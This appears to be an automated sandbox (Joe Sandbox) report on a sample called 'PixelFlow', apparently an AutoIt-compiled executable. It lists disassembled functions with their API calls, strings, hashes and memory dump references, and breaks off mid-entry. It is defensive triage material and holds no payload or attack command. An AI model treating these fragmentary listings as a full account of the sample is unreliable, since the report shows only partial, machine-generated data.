Opcode ID: 8a7d2de32a1ae7aea6c3fe7b0ccc1b8bd2278ac929446240fdc7ac362e36615d
Instruction ID: bb5631b8ca04dab7c35573e9ccc6f0dc59329698adde345465b52589f2c386a7
Opcode Fuzzy Hash: 8a7d2de32a1ae7aea6c3fe7b0ccc1b8bd2278ac929446240fdc7ac362e36615d
Instruction Fuzzy Hash: 9851BB2090478829FF35E77085157EBBFB69F42340F0845AED5C25B6C3DA54AB8CCBA5

Function 0065CBE3 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0065CBFF
GetWindowRect.USER32(00000000,?), ref: 0065CC11
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065CC6F
GetDlgItem.USER32(?,00000002), ref: 0065CC7A
GetWindowRect.USER32(00000000,?), ref: 0065CC8C
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065CCE0
GetDlgItem.USER32(?,000003E9), ref: 0065CCEE
GetWindowRect.USER32(00000000,?), ref: 0065CCFF
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065CD42
GetDlgItem.USER32(?,000003EA), ref: 0065CD50
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065CD6D
InvalidateRect.USER32(?,00000000,00000001), ref: 0065CD7A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: e89ffcb46fc9bda82513c9c8e4c39b168b720b2875a09af9b8e39b98e22dd5d4
Instruction ID: edf39db742e5b803ebf9be613ebecfe828e4964bc1575e7ed7fe6a352dc6d8f5
Opcode Fuzzy Hash: e89ffcb46fc9bda82513c9c8e4c39b168b720b2875a09af9b8e39b98e22dd5d4
Instruction Fuzzy Hash: A8512371B00205AFDB18CFA9DD95AADBBBAEF88311F14812DF915D7690D7709D04CB50

Function 00602581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006029AB: GetWindowLongW.USER32(?,000000EB), ref: 006029BC

GetSysColor.USER32(0000000F), ref: 006025AF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2ce45efd30410044d109baed9921ea9554447b95a3e57aced18097cbd27b0329
Instruction ID: 5d7b13372d19be05f128e0aa6cf3ee250ecc7003472800482051eeb5baba1e5e
Opcode Fuzzy Hash: 2ce45efd30410044d109baed9921ea9554447b95a3e57aced18097cbd27b0329
Instruction Fuzzy Hash: CF41B231044101AFDB295F28CC9CBBA3B67EF06330F194265FD668A2E2C7318C42EB65

Function 006129BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00620AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00612A3E,?,00008000), ref: 00620AD2

Part of subcall function 006201AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00612A58,?,00008000), ref: 006201CF

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00612ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00612C2C

Part of subcall function 00613EBE: _wcscpy.LIBCMT ref: 00613EF6

Part of subcall function 0062379F: _iswctype.LIBCMT ref: 006237A7

Strings

EA06, xrefs: 0064FCC8
Error opening the file, xrefs: 0064FCB3, 0064FD2A
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0064FC97
Unterminated string, xrefs: 00650056
AU3!, xrefs: 00612A93
Bad directive syntax error, xrefs: 0065000F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: de9af86157425ec507b458b573b324fdd57851c26b4278d68c3bf8b3ffe8058e
Instruction ID: 2e41f2da506dfb020bd64eb25530faae08ccd6a320fb461fb7e5c486b3f3e303
Opcode Fuzzy Hash: de9af86157425ec507b458b573b324fdd57851c26b4278d68c3bf8b3ffe8058e
Instruction Fuzzy Hash: 7102C1701083419FC7A4EF24C851AEFBBE7AF95354F04492DF586972A2DB30DA89CB46

Function 0068C3AF Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

Part of subcall function 00602714: GetCursorPos.USER32(?), ref: 00602727
Part of subcall function 00602714: ScreenToClient.USER32(006C67B0,?), ref: 00602744
Part of subcall function 00602714: GetAsyncKeyState.USER32(00000001), ref: 00602769
Part of subcall function 00602714: GetAsyncKeyState.USER32(00000002), ref: 00602777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0068C417
ImageList_EndDrag.COMCTL32 ref: 0068C41D
ReleaseCapture.USER32 ref: 0068C423
SetWindowTextW.USER32(?,00000000), ref: 0068C4CD
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0068C4E0
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0068C5C2

Strings

prl, xrefs: 0068C56B
prl, xrefs: 0068C530
@GUI_DROPID, xrefs: 0068C514
@GUI_DRAGFILE, xrefs: 0068C557

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$prl$prl
API String ID: 1924731296-3599107008
Opcode ID: 80843dc6dfbd892298e560fca93cb77ea65b4f79faeeb3c08d6f5a7fb0c626ab
Instruction ID: 5e189cf7add6c35b5822ff39da15027137e280ec9c6486bf59c3ec9f71e7f8a8
Opcode Fuzzy Hash: 80843dc6dfbd892298e560fca93cb77ea65b4f79faeeb3c08d6f5a7fb0c626ab
Instruction Fuzzy Hash: 1E517C70204305AFDB14EF14CC55FAA7BE6EF84310F104A1DF995972E2CB70A955CB66

Function 00604D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00604D62
__swprintf.LIBCMT ref: 00604DAC
__i64tow.LIBCMT ref: 0063DA6B

Strings

False, xrefs: 0063DA33
%.15g, xrefs: 00604DA6
True, xrefs: 0063DA2C
0x%p, xrefs: 0063DA4D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f2cad1016a0eb6ac92a99c83c2403fcd3fe952e880e5c2649bbcd94122a56146
Instruction ID: 4235d03f3864dcb4c6e19589d948c28f4e47534ad5436398dca6e5d3d8502e3d
Opcode Fuzzy Hash: f2cad1016a0eb6ac92a99c83c2403fcd3fe952e880e5c2649bbcd94122a56146
Instruction Fuzzy Hash: 544104B1544615AEEB38DF34E942ABAB3EBEF45300F20046EE649D73D1EE319942CB50

Function 0068753F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00687557
CreateMenu.USER32 ref: 00687572
SetMenu.USER32(?,00000000), ref: 00687581
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068760E
IsMenu.USER32(?), ref: 00687624
CreatePopupMenu.USER32 ref: 0068762E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0068765B
DrawMenuBar.USER32 ref: 00687663

Strings

0, xrefs: 0068754D
F, xrefs: 0068764F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: a81444473d3bd93bd0cfb9b705e64be73ff77a674aa083976a2c0daed4b95361
Instruction ID: 58d4590d1db83c843b4e76928a611acf378f62ffa739bc029ba5625d2ac7652c
Opcode Fuzzy Hash: a81444473d3bd93bd0cfb9b705e64be73ff77a674aa083976a2c0daed4b95361
Instruction Fuzzy Hash: 6E414A74A05205EFDB10DF64D944BDA7BBAFF48350F244129F94997360D771A910CF54

Function 006878A8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0068794B
CreateCompatibleDC.GDI32(00000000), ref: 00687952
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00687965
SelectObject.GDI32(00000000,00000000), ref: 0068796D
GetPixel.GDI32(00000000,00000000,00000000), ref: 00687978
DeleteDC.GDI32(00000000), ref: 00687981
GetWindowLongW.USER32(?,000000EC), ref: 0068798B
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0068799F
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006879AB

Strings

static, xrefs: 006878E3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 699513294080d71f3d68b0adf6c14b5d0449062c3b5fc8fcbd07d560cea0f0d8
Instruction ID: d04a1e817ccf0623624b51e62fc281e277bf7eb3ccda3a2a6f1e032799236113
Opcode Fuzzy Hash: 699513294080d71f3d68b0adf6c14b5d0449062c3b5fc8fcbd07d560cea0f0d8
Instruction Fuzzy Hash: 9B316D32105119AFEF11AFA4DC09FEA3B6EFF09360F111315FA59A61A0C731D821DBA4

Function 00626F60 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00626F9B

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

__gmtime64_s.LIBCMT ref: 00627034
__gmtime64_s.LIBCMT ref: 0062706A
__gmtime64_s.LIBCMT ref: 00627087
__allrem.LIBCMT ref: 006270DD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006270F9
__allrem.LIBCMT ref: 00627110
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062712E
__allrem.LIBCMT ref: 00627145
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00627163
__invoke_watson.LIBCMT ref: 006271D4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: b788b9793de5383d1a06029cf8ea4e8a7697b6cfcc94a8c205986607c7d57cc4
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: DD71E871A00B26ABE7149E69EC42F9AB3AAAF15360F14423DF514D7781EB70E9108FD4

Function 00662B3A Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662B55
GetMenuItemInfoW.USER32(006C6890,000000FF,00000000,00000030), ref: 00662BB6
SetMenuItemInfoW.USER32(006C6890,00000004,00000000,00000030), ref: 00662BEC
Sleep.KERNEL32(000001F4), ref: 00662BFE
GetMenuItemCount.USER32(?), ref: 00662C42
GetMenuItemID.USER32(?,00000000), ref: 00662C5E
GetMenuItemID.USER32(?,-00000001), ref: 00662C88
GetMenuItemID.USER32(?,?), ref: 00662CCD
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00662D13
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662D27
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662D48

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 1cf89390b7a19cecf4201785ce3e3b35c1cdd2238c81c5854a01f0e8ecb4ff2e
Instruction ID: ad0cbe40bc0e12b95f6bc993ef99e35bdefc760c8dff550c6d6cf8a98db9d62d
Opcode Fuzzy Hash: 1cf89390b7a19cecf4201785ce3e3b35c1cdd2238c81c5854a01f0e8ecb4ff2e
Instruction Fuzzy Hash: A1618DB0900A4AAFDB50CF64DDA8DFE7BBAEF44304F14005AE841A7391D771AE46DB61

Function 00687310 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00687392
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00687395
GetWindowLongW.USER32(?,000000F0), ref: 006873B9
_memset.LIBCMT ref: 006873CA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006873DC
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00687454

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 44f66878fa3a90e3bb284bf0c3ad0cc402405c0d9c5c613f7f776c69c5451227
Instruction ID: a59d4974e8bb73a3e11e1fec78fc0bbc97f00a0bbf646e2ae78fd6ca30da05a5
Opcode Fuzzy Hash: 44f66878fa3a90e3bb284bf0c3ad0cc402405c0d9c5c613f7f776c69c5451227
Instruction Fuzzy Hash: 3F614A75900208AFDB10EFA4CC85EEE77FAEF09714F200259FA15A72A1C770A955DBA4

Function 00657599 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006575C0
SafeArrayAllocData.OLEAUT32(?), ref: 00657619
VariantInit.OLEAUT32(?), ref: 0065762B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0065764B
VariantCopy.OLEAUT32(?,?), ref: 0065769E
SafeArrayUnaccessData.OLEAUT32(?), ref: 006576B2
VariantClear.OLEAUT32(?), ref: 006576C7
SafeArrayDestroyData.OLEAUT32(?), ref: 006576D4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006576DD
VariantClear.OLEAUT32(?), ref: 006576EF
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006576FA

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a95c0b7a380b1fb73262ee495c31e559e3a263dab87a5b0a9f2311dee368eee0
Instruction ID: 9dabc4d39c9ce9063f9ff7eddb8bf6926f871b483122208ec165768f087a1f9c
Opcode Fuzzy Hash: a95c0b7a380b1fb73262ee495c31e559e3a263dab87a5b0a9f2311dee368eee0
Instruction Fuzzy Hash: E4417135A00219DFDB04DF68D8449EEBBBAFF08311F008069E905A7261DB30A94ACF90

Function 00660374 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0066039C
GetAsyncKeyState.USER32(000000A0), ref: 0066041D
GetKeyState.USER32(000000A0), ref: 00660438
GetAsyncKeyState.USER32(000000A1), ref: 00660452
GetKeyState.USER32(000000A1), ref: 00660467
GetAsyncKeyState.USER32(00000011), ref: 0066047F
GetKeyState.USER32(00000011), ref: 00660491
GetAsyncKeyState.USER32(00000012), ref: 006604A9
GetKeyState.USER32(00000012), ref: 006604BB
GetAsyncKeyState.USER32(0000005B), ref: 006604D3
GetKeyState.USER32(0000005B), ref: 006604E5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c16a058d469364c00b478f1a9cbecaaa8c52d571a9ecccd6224278480379b9b2
Instruction ID: 5686c00c9f606cdc1acba09764715e4a40fc265a0aded8075f8f70d3785405c2
Opcode Fuzzy Hash: c16a058d469364c00b478f1a9cbecaaa8c52d571a9ecccd6224278480379b9b2
Instruction Fuzzy Hash: 3441C8205447CAAEFF318B6489047F7BEE66B51344F08807ADBC5567C2EFA459C4CBA2

Function 0067886D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

CoInitialize.OLE32 ref: 006788B5
CoUninitialize.OLE32 ref: 006788C0
CoCreateInstance.OLE32(?,00000000,00000017,00693BBC,?), ref: 00678920
IIDFromString.OLE32(?,?), ref: 00678993
VariantInit.OLEAUT32(?), ref: 00678A2D
VariantClear.OLEAUT32(?), ref: 00678A8E

Strings

Failed to create object, xrefs: 0067892B, 006789E1
NULL Pointer assignment, xrefs: 00678965
Invalid parameter, xrefs: 006789AC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 65895c2da5d672f19d8b31d4307fb3d1b975ac3f5278b53d3136d4ca223e4c44
Instruction ID: 4d74dc10b61d7c1c4073880f0ed886c55e68efa495cf74e33a6ab317d386bc3e
Opcode Fuzzy Hash: 65895c2da5d672f19d8b31d4307fb3d1b975ac3f5278b53d3136d4ca223e4c44
Instruction Fuzzy Hash: 55619170648701DFD710DF24C849BAEB7EAAF44714F00894EFA899B291DB70ED49CB96

Function 0066B973 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066B980
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066B9F6
GetLastError.KERNEL32 ref: 0066BA00
SetErrorMode.KERNEL32(00000000,READY), ref: 0066BA6D

Strings

READONLY, xrefs: 0066BA38
READY, xrefs: 0066BA46
NOTREADY, xrefs: 0066BA2C
INVALID, xrefs: 0066BA3F
UNKNOWN, xrefs: 0066BA25

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 8a01d38ad82dc35caed20e20feebed4592f0d0e061dfa4ac7384859abf7939e7
Instruction ID: 6d9b6555b2635563234e6415785627c5b99c47f10ba7bdedb37b98f24c558b5e
Opcode Fuzzy Hash: 8a01d38ad82dc35caed20e20feebed4592f0d0e061dfa4ac7384859abf7939e7
Instruction Fuzzy Hash: 2A31C475A40205EFCB10EFA4D885AFEB7BBEF45304F14901AE901D7291DB719E82CB90

Function 0066334A Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006633E9

Strings

info, xrefs: 0066338A
warning, xrefs: 006633D2
stop, xrefs: 006633BA
question, xrefs: 006633A2
,jl0jl, xrefs: 006633FA
blank, xrefs: 0066336B
,jl0jl, xrefs: 0066337C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
